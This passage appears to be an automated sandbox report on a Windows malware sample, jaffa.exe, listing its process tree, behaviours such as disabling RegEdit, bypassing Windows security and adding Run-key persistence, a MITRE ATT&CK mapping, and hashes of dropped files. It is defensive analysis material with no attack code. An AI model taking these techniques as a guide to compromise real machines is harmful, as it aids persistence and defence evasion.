C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\jaffa.exejaffa.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4780 -
C:\Windows\SysWOW64\xrtlhfmpdy.exexrtlhfmpdy.exe6⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5460 -
C:\Windows\SysWOW64\fqlmsghx.exeC:\Windows\system32\fqlmsghx.exe7⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936
-
-
-
C:\Windows\SysWOW64\dkjmelpcwqstgwc.exedkjmelpcwqstgwc.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:336
-
-
C:\Windows\SysWOW64\fqlmsghx.exefqlmsghx.exe6⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5968
-
-
C:\Windows\SysWOW64\addvjytjpmrfj.exeaddvjytjpmrfj.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1676
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""6⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5736
-
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:620
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3620
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4156
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify Tools
2Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
512KB
MD50761b2e729f3e2fd113041eb42dfb05d
SHA1bade88abf76d558b6de6e9a8ba5367aa39462f74
SHA2566fd063d5adaf5775061854f4c79818b347b1084e08379c2251690f63671ad321
SHA5127284c06d3a31aa32d769aa7e2e5061fa32ff64ea26210632192844c7102ff0a6cb98d172a40275ddd99c7923ea2b3dc587902a91a2ad4906dc66bf267ce1fa6c
-
Filesize
512KB
MD5df5d7e5337dad9662b42916518ab3d09
SHA133319256ae496f7da8e8a24da32ee77fe74ff6ae
SHA2565c4c70fca2cf36e8c4d0a8557b42a7db57fb37e4476827cd5f9ddf3a56596ec9
SHA5121c358fac782481624cba3f1ef1db89f20d214eb5ac705d5fbf4e80d94bb8fe1aa75af3faf3407341df178130a6418ec78e6c7047be4aaf94861344ec4fe8bf46
-
Filesize
152B
MD556641592f6e69f5f5fb06f2319384490
SHA16a86be42e2c6d26b7830ad9f4e2627995fd91069
SHA25602d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455
SHA512c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868
-
Filesize
152B
MD5612a6c4247ef652299b376221c984213
SHA1d306f3b16bde39708aa862aee372345feb559750
SHA2569d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a
SHA51234a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973
-
Filesize
5KB
MD5181c090007b6e7b587ab6ae806e4a0f4
SHA17a4b8d1d6c798c6f2b5b1a45d1e0a059879c6c8f
SHA2561d0d3fb88fd39bd370970468504210720e91e6f83838325de65a6b142da37215
SHA512ee02fd81946ba5fbd0fa5f0a56771fa476a6b7ad95bd5c0273faeeb74549c64d3d5b29ba955a9ed28708df11b0be53ca338266c7c3df5b8a0fe9b218ca60b882
-
Filesize
6KB
MD5f33d416b0664b0484e09ca81b7192e3b
SHA1c2552d26b38553b60638e7f428bebe35c7a7281c
SHA2568bf9370123c234cc41bd7af86ed6215a32b7d7d08a24ae69ff4f16dd798bea7b
SHA5125069f6a08849a95aa5550f6cc8891273c50af4a4fa2e37693065eac5a301cd2ab826a63eefd9846ed595db7a4f3439f87abea5aee7f8fa5199a34428351793e0
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5481ad1581d1a4fa37910df79c486110d
SHA1e313fe351edb37178692b43f13cb9a70ed431769
SHA256dc504a22729a6e6ab5f8837205575b6f34610631e6839f8eb3452ca4bb2459a9
SHA512367eefd89eab4a2d66eb3e2eb8bc31a9b3b2f7ff40c11b92053a76764c44928bd0158f779f70b1aaa4612f706d3074804a615befb0e52eb75db8d43fd9ad55e5
-
Filesize
11KB
MD51430e1481ebcef7ba289cad6f89b499e
SHA1434badff9e702d7219624434ced92f0976477b4d
SHA25641aedbff17680fd40328ca3a563aadfc310cf0924e61f577d0b72070b817cdd5
SHA5125b6327ad9bcc1074d2103db1d216bddb685f1eee881bc4c4a2046189d605e9880ad14f1d1ad2fd5563b0d5d31aa9fd6ce88870c131cb9e1737a3b7ebb6bdabc4
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD594ea9f4b912536e83ff60d2bf974d944
SHA11b6ee622b26a727b3b2f1e41f736e28e4043751c
SHA256a111172b425057e6d919b7cecda1be83f1ebbc580793428801b810e62eaaa446
SHA512a7daa08e0b5a9a0b230e41760289f2d97c6da8570b34d787c260f2e6495d8266e8665bee5c8e4fbb96c19c8c00432a16216df8d2228788be210030864eefaa35
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16KB
MD5781611469f33b3a922447d19092e5dd4
SHA1fa2363c21b8f5941c0a85dcaaf4aff8ce36826ab
SHA256980cff894604a6301b31a47bdb7cb8a44b7779cdcb091d4af64809e31c39c1f1
SHA512a320027006275c41397614d93ff77ef241d635b2a70aaaa3472ee917cd6dd2b61f8ae111aff0cc36949f650df003b69958c555e0fcdd34bb5e479c579685ca17
-
Filesize
239B
MD512b138a5a40ffb88d1850866bf2959cd
SHA157001ba2de61329118440de3e9f8a81074cb28a2
SHA2569def83813762ad0c5f6fdd68707d43b7ccd26633b2123254272180d76bc3faaf
SHA5129f69865a791d09dec41df24d68ad2ab8292d1b5beeca8324ba02feba71a66f1ca4bb44954e760c0037c8db1ac00d71581cab4c77acbc3fb741940b17ccc444eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD520b6e2ac9c670ef435321a73356f46b4
SHA18ceebd9516df46c1c6652f22e24436a48907e5d8
SHA256c46d7fcd952d13caa4264a76577862d869e313d77e881b689ced63790ecf5ca7
SHA512243acc8351c2e574c5b09ef468be68c0c63ed92c339abc0270c948be9c92074b84af788f55745e4b2f612a0c1c646d922e15a73fdeac7d1650e388a7d1dca833
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5e7a82b487ed21d25240ac1d62d33d1d3
SHA1ed5157e77ae0fb039b5ad2cbc3ad44bd2fcc0d37
SHA25606e2e5f10c307995bbc6530c574bcb29e6ff71a0ab038837c9b304aa00af100e
SHA512afb47c4156c680b1bf6edeaf088f071b765c4fa1f9405522e363d3dc1514957a818b9052106b7c922f3275915efecf3ab621fd0bd7de2467cfa6d3cb202c9f1c
-
Filesize
5.1MB
MD563d052b547c66ac7678685d9f3308884
SHA1a6e42e6a86e3ff9fec137c52b1086ee140a7b242
SHA2568634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba
SHA512565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642
-
Filesize
844KB
MD57ecfc8cd7455dd9998f7dad88f2a8a9d
SHA11751d9389adb1e7187afa4938a3559e58739dce6
SHA2562e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
-
Filesize
26B
MD57a97744bc621cf22890e2aebd10fd5c8
SHA11147c8df448fe73da6aa6c396c5c53457df87620
SHA256153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA51289c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967
-
Filesize
512KB
MD56b1b6c081780047b333e1e9fb8e473b6
SHA18c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447
-
Filesize
5KB
MD53a66b8c04d1437b4c4da631053a76bb5
SHA1bcf8f381932d376f3f8e53c82b2b13ff31ee097b
SHA256c3aa0c8ff9e3c7e10bcd3829f3e63b4cf9c59eb4964a7576f3ef5fca50c77cdc
SHA512b24f3fb34aa293293d4f7bef247ca746608cb9ae54d214492276e7ef0fe0032944ea082f2bbf42f200359d38ed2af69f51ef5f3cb969a0ffb7176b27e0279fcf
-
Filesize
867B
MD54eab82459d6247d5cb735bc6883a0b1f
SHA1d4e1ee562a1594b0f6a01134d9acdb36021bf8f8
SHA2564545d060ce8984205a5e1a136a523cb34c7a5df5427aeabc94bc2693b8773b2f
SHA512de3ae9666d4c681ee05a7ae7fc2c5c84e204044dc29553db2377dd3e25694ae8b5739bb56bcfa80ccc19dfff147e1b095505e092bac8ec9bcbb324988e69dc59
-
Filesize
3.1MB
MD597cd39b10b06129cb419a72e1a1827b0
SHA1d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA2566bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233
-
Filesize
44KB
MD5324f8384507560259aaa182eb0c7f94a
SHA13b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d
-
Filesize
16B
MD5683678b879bd775b775240fcb1cd495e
SHA110bc596b3d03e1ba328068305c8acee2745c731c
SHA25664f28aef02c7fafbc9d80735a8b1d607c3996a2ddf9ba260d4c433c002efeaba
SHA5123b2b9d231643a826183732a79489c6d2f4749ce25314c444364062c781627af59b572c082d811ae57a839cae94de77cf03eb81d99e1063e2191e884ccbaa0963
-
Filesize
764KB
MD5e45dcabc64578b3cf27c5338f26862f1
SHA11c376ec14025cabe24672620dcb941684fbd42b3
SHA256b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA5125d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9
-
Filesize
176B
MD51fab717c517da1c27e82a93edddf9390
SHA124b6cfda27c15c1d01ba5718106c18687ed77397
SHA256bd035700f060a35c394600cabf0cf04c031927786c97cf41c55d78dddeffa11c
SHA5125452938fa310396ecacae8eab64bdae624f617e19c0d742e10e088befb686c205b8db9ccec7d9de1c9360f341db8a701d5b8c6c4eb20aaa1c2deb831ab09fab5
-
Filesize
512KB
MD57290cc301b62882ba13fae9faa6da15c
SHA1872c638d8451106e007792135e90bb34157cfca3
SHA2567963a9c10439eebbdbd657b7ac024022975b8bf8a577b13b92daa6dbda5bdf3a
SHA512206562fb0f864e9d6dfaa463006e9a27caec3604fc3e8e5207c1ffc98ddc1ef23f6b3ecb2ff84301eb9e6541c42a0a1de6914885b2707c38ceef7e4fc5e81dc0
-
Filesize
512KB
MD5d0295e2113ecdbcb95e83371caec5aad
SHA1bc7fa1ae0668eb3ced3843a26071ab5a928546eb
SHA256f815ef6d43830b18afb30d7922d4f34ce69c5fcc818db941a07d0aea33ff0162
SHA51262b49ea633f951ff38263c00fbbae9a1ff14ea2ce63660f88b34a6709fbd50bd17b55b147e257a01c36f96ef0a287b04b940768475027c4fc7d7a309d1b18423
-
Filesize
512KB
MD566d5f5957f6dd51e8c707a6096b5ef23
SHA1eaca7fb9f529af5a77c9b323aa2b4f0d31ef1050
SHA2562bd6e8cd6831b2619981857f0efd5c6b20417bad79c1361032202073a68f406b
SHA512d7635e3425e4cce04d2f846d8fd07481857308f2bcee1725a60a82019328796d70c874d3f7c45aca1dae5896da054105669b777f3756b9ac8f06b691c56c172f
-
Filesize
512KB
MD5dde15c56592ef1b7809385a637c266b4
SHA14f18073fb335bdf8f1a71e58877987037182ba99
SHA256e90e117eea44342539adb7fdb6afc397967b1d7d1f46d2e806555641503ae1c9
SHA512b0e0ddcd5cfa18cd1238c7f82f2f4d5bbca94b00737265f7c99a935baf32984f86f282686c17219b8583a229f9615705c1184d35ad5117ed9d1328d6529c396e
-
Filesize
223B
MD506604e5941c126e2e7be02c5cd9f62ec
SHA14eb9fdf8ff4e1e539236002bd363b82c8f8930e1
SHA25685f2405d1f67021a3206faa26f6887932fea71aea070df3efb2902902e2d03e2
SHA512803f5f2fddbf29fef34de184eb35c2311b7a694740983ca10b54ef252dd26cda4987458d2569f441c6dedc3478bea12b45bfd3566f1b256504a0869ad3829df7
-
Filesize
512KB
MD5741cff4d012d8a10e77a59656ac417a5
SHA13edef8dd5938da3f031e513b6b1089f12d1dc642
SHA256a3c357d03ae0db78c2d72aa2feb68bb9af591e3bc960553dfcb673d072e251f8
SHA5120d0384a01c32e7ea3c8d5e5ab30488a3bfdeafd84f6f20666fcede8b416f298a6f6f4d01864707f379105f3751d37b31b1e69fecc17ffdf4e49e056fdf419ef9
-
Filesize
512KB
MD5931363f9b0d479f108d1e62e5593d506
SHA1b757ad4fa2acf3969fd53dbb727c37f757b77287
SHA256a21cb03fe5c58cd23080a3f41fd4cef23cd27d9823ae5a7086b679b4119d1e7e
SHA512e60d4950f7dd98208b279f00a071475482b37d2724e5122623ae8b9e7899eb3dff2a075bb18614df4a7d85bd3c44e07652607d06f373254bb2ef64a74b08fea0